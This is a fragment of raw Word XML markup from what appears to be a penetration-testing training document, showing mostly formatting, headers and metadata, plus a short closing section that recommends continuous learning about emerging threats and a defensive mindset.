                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8586" style="position:absolute;width:57270;height:91;left:34;top:168;" coordsize="5727066,9144" path="m0,0l5727066,0l5727066,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8587" style="position:absolute;width:91;height:91;left:57306;top:168;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD32EA7" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:right="47" w:hanging="229"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Continuous Learning and Adaptation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B1B3CE" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stay updated with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>emerging threats, zero-days, and new exploits</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364BB87C" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Learn how attackers evolve tactics—keeping you agile and informed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F12DF0" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="194"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Develop a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>defensive mindset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> based on offensive knowledge. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7C0F33" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="166"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="F03A17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>You become a better defender by being a capable tester.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E600E83" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7619A282" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D37DE4">
      <w:headerReference w:type="even" r:id="rId12"/>
      <w:headerReference w:type="default" r:id="rId13"/>
      <w:headerReference w:type="first" r:id="rId14"/>
      <w:pgSz w:w="11905" w:h="16840"/>
      <w:pgMar w:top="1880" w:right="1386" w:bottom="1444" w:left="1441"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8704C" w14:textId="77777777" w:rsidR="00730800" w:rsidRDefault="00730800">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="51AB5B45" w14:textId="77777777" w:rsidR="00730800" w:rsidRDefault="0073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2FF18" w14:textId="77777777" w:rsidR="00730800" w:rsidRDefault="00730800">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1200BD47" w14:textId="77777777" w:rsidR="00730800" w:rsidRDefault="00730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8472B" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t xml:space="preserve">NETWORK PENETRATION TESTING WITH REAL WORLD EXPLOITS </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="51FEF57E" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t xml:space="preserve">AND SECURITY REMEDATION </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="3D1CB771" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pP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D02B1" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t xml:space="preserve">NETWORK PENETRATION TESTING WITH REAL WORLD EXPLOITS </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="68ECF4AC" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t xml:space="preserve">AND SECURITY REMEDATION </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="65736969" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pP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A38EB" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t xml:space="preserve">NETWORK PENETRATION TESTING WITH REAL WORLD EXPLOITS </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="73C67D96" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t xml:space="preserve">AND SECURITY REMEDATION </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="20CCEB1D" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:r>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7538C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B84A6108"/>
    <w:lvl w:ilvl="0" w:tplc="0256DFA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DF07526">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8FEEA5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15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5F015C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlRestart w:val="0"/>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E3422DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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F68ACE8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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A56D85E">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A04EDFC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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9CE1CE8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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E921F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3604A0C"/>
    <w:lvl w:ilvl="0" w:tplc="21866956">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30EA702">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60C33F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0409B8">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0CEFB34">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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17C9B38">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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20BE34">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4288FCE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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AE4852A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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FB4660"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17C07182"/>
    <w:lvl w:ilvl="0" w:tplc="1C1CC6AE">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ADAE7B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="16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1E0D38">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="23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DE962E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="31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636BBA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="38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94753E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="45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D7A7C60">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="52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CA8E31C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="59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EC2F56C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="67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27A96"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="44F24A0E"/>
    <w:lvl w:ilvl="0" w:tplc="6A2208D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="22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840FB6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249700">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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92BAD0">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BC68CC">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F489C8">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7EDEA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8A671C">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B6AA5A">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FED18BF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14161226"/>
    <w:lvl w:ilvl="0" w:tplc="8230DF74">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FE1D92">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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9E8E9C">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CE872E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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F09988">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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CEB540">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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0EB9AE">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2CEA1C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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5A3C0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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45A65AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="496AC820"/>
    <w:lvl w:ilvl="0" w:tplc="16063BAA">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AD8DAC2">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16E1B6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52EF064">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B34D8AC">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330603C">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BAF07C">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B52F95A">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854F072">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50A53A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41A49480"/>
    <w:lvl w:ilvl="0" w:tplc="5A54C42A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="❖"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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F32D596">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%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B0CE38">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10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2EE8866">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="23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56E711A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="30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E24FFB2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="37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F866638">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="45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9D0C17C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="52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C0E6098">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="59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794564778">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="415057576">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1743748063">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1394281611">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="735468662">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="788426799">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="123378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DE4"/>
    <w:rsid w:val="00730800"/>
    <w:rsid w:val="00761F1F"/>
    <w:rsid w:val="00D37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7AB1"/>
  <w15:docId w15:val="{244DAFAB-05FF-4D0E-A92C-7884D29A8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rightsec.com/blog/network-penetration-testin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brightsec.com/blog/network-penetration-testing/"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dhadse</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>DIVAKAR MANDAL</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-03T16:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-03T16:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>